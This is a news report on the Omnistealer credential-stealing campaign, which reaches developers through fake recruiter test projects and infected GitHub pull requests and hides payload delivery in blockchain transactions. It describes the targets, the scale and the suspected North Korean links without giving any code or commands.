Omnistealer malware campaign targets developers through GitHub
A global credential-stealing operation known as Omnistealer has emerged from a GitHub repository and freelance job offers targeting blockchain developers. Security researchers indicate that Omnistealer has the potential to rival major cyberattacks like WannaCry.
The malware utilizes public blockchains not just for payments, but also as part of its delivery system. Once activated, it extracts sensitive information from victims’ machines, exposing multiple forms of sensitive data simultaneously.
The malware’s triggering mechanism connects to the TRON or Aptos blockchains, which offer cost-effective operations. It reads hidden transaction data to access the Binance Smart Chain, which delivers additional malicious code. As noted by Nick Smart, chief intelligence officer at Crystal Intelligence, the “final payload” executed by Omnistealer can gather extensive information from compromised systems.
Omnistealer targets over 60 cryptocurrency wallet extensions, includes more than 10 password managers, and can affect browsers like Chrome and Firefox. Investigators have linked around 300,000 stolen credentials to this operation, which includes data from both cybersecurity firms and government agencies across the United States and Bangladesh.
The primary targets are developers and contractors, with attackers impersonating recruiters for well-known companies and freelance developers. As of January, researchers identified two common strategies. The first involves posing as recruiters who “hire” South Asian developers for test projects containing hidden malware. The second involves malicious developers submitting infected pull requests directly through GitHub.
South Asia, particularly India, has been targeted for its large pool of GitHub developers and economically vulnerable workforce. Some malicious activities are traced back to IP addresses in Vladivostok, Russia, previously linked to North Korean operations.
Some cryptocurrency wallets noted in this operation match those connected to a $1.5 billion theft by the Lazarus Group, raising concerns about ongoing financial exploitation. The social-engineering tactics resemble a North Korean subset known as Contagious Interview, according to Nick Carlsen from TRM Labs.
Carlsen emphasized that financial gain remains a primary objective for North Korean cyber operations. Stolen cryptocurrencies could be used to support military programs. The massive collection of credentials may also enable the creation of convincing fake profiles, facilitating fund laundering or selling access on underground markets.
Ransom-ISAC reported that Omnistealer’s structure complicates shutdown efforts, as attack components are embedded within blockchain transactions, making tracking difficult. The organization highlighted the technique of “hiding malicious payloads within blockchain” as an emerging strategy among threat actors.